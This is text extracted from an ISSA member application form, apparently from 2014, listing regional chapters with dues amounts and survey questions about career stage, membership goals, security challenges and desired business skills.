Baton Rouge...................... 25
Blue Ridge......................... 25
Bluegrass ............................ 0
Boise ................................. 25
Buffalo Niagara.................. 25

Where would you place yourself in your career lifecycle?

n Executive: CISO, senior scientist, principal or highest level in respective field
n Senior: department manager or 7+ years in respective field
n Mid-Career: 5-7 years with an identified field of security specialty
n Entry Level: 1-5 years, generalist
n Pre-Professional: Student or newcomer exploring the field
The most important aspects of my membership for the current membership
term are:
n Build or maintain professional relationships with peers
n Keep up on developments and solutions in cybersecurity, risk or privacy
n Establish a professional development strategy to achieve my individual career goals
n Increase my personal visibility and stature within the profession
n Share my knowledge and expertise to advance the field
n Develop the next generation of cybersecurity professionals
n Earn CPEs/CPUs to maintain certifications or credentials
n Access to products, resources and learning opportunities to enhance job performance
n Problem solving or unbiased recommendations for products and services from peers
n Gain leadership experience
n All n None
Most challenging information security issue?
n Governance, risk and compliance
n Securing the mobile workforce and addressing consumerization
n Data protection
n Application security
n Security and third party vendors
n Security awareness
n Threat updates
n Legal and regulatory trends
n Endpoint security
n Incident response
n Strategy and architecture
n All n None
Which business skills would be most valuable for your professional growth?
n Presenting the business case for information security
n Psychology behind effective security awareness training
n Budgeting and financial management
n Business forecasting and planning
n Management and supervisory skills
n Legal knowledge
n Presentation skills
n Negotiation skills
n Written and verbal communications
n All n None

Changes/additions visit our website www.issa.org

Capitol Of Texas ................ 35

Central Alabama .................. 0
Central Florida .................. 25
Central Indiana .................. 25
Central New York................. 0
Central Ohio ...................... 20
Central Pennsylvania......... 20
Central Plains.................... 30
Central Virginia ................. 25
Charleston......................... 25
Charlotte Metro ................. 30
Chicago............................. 30
Colorado Springs .............. 25
Connecticut ....................... 20
Dayton............................... 25
Delaware Valley ................. 20
Denver............................... 25
Des Moines ....................... 30
East Tennessee .................. 35
Eastern Idaho ...................... 0
Eastern Iowa ........................ 0
Fort Worth ......................... 20
Grand Rapids ...................... 0
Greater Augusta................. 25
Greater Cincinnati ............. 10
Greater Spokane ................ 20

Hampton Roads................. 30
Hawaii ............................... 20
Inland Empire .................... 20
Kansas City ....................... 20
Kentuckiana....................... 35
Kern County ...................... 25
Lansing ............................. 20
Las Vegas.......................... 30
Los Angeles ...................... 20
Madison ............................ 15
Mankato ............................ 20
Melbourne, FL................... 25
Memphis ........................... 30
Metro Atlanta..................... 30
Middle Tennessee ............. 35
Milwaukee ......................... 30
Minnesota ......................... 20
Montana ............................ 25
Montgomery ..................... 20
Montreal.............................. 0
Motor City ......................... 25
Mountaineer ...................... 25
National Capital................. 25
New England ..................... 20
New Hampshire ................. 20
New Jersey ........................ 20

New York Metro................. 55

North Alabama .................. 15
North Dakota ..................... 25
North Oakland ................... 25
North Texas ....................... 20
Northeast Florida............... 30
Northeast Indiana .............. 10
Northeast Ohio .................. 20
Northern New Mexico........ 20
Northern Virginia............... 25
Northwest Arkansas........... 15
Oklahoma .......................... 30
Oklahoma City................... 25
Omaha................................. 0
Orange County .................. 20
Ottawa ............................... 10
Palouse Area ..................... 30
Phoenix ............................. 30
Pittsburgh ......................... 30
Portland ............................ 30
Puget Sound ..................... 20
Quebec City......................... 0
Rainier............................... 20
Raleigh .............................. 25
Rochester .......................... 15
Sacramento Valley............. 20

San Diego ......................... 30

San Francisco ................... 20
SC Midlands ..................... 25
Silicon Valley .................... 30
South Bend, IN (Michiana) .. 25
South Florida .................... 20
South Texas....................... 30
Southeast Arizona ............. 20
Southern Indiana ............... 20
Southern Maine................. 20
Southern Tier of NY............. 0
St. Louis............................ 20
Tampa Bay......................... 20
Tech Valley Of New York.... 35
Texas Gulf Coast ............... 30
Toronto.............................. 20
Tri-Cities ........................... 20
Triad of NC ........................ 25
Tucson, AZ ........................ 10
Upstate SC .......................... 0
Utah .................................. 15
Vancouver ......................... 20
Ventura, CA ....................... 30
Yorktown ........................... 30

ISSA Member Application 2/14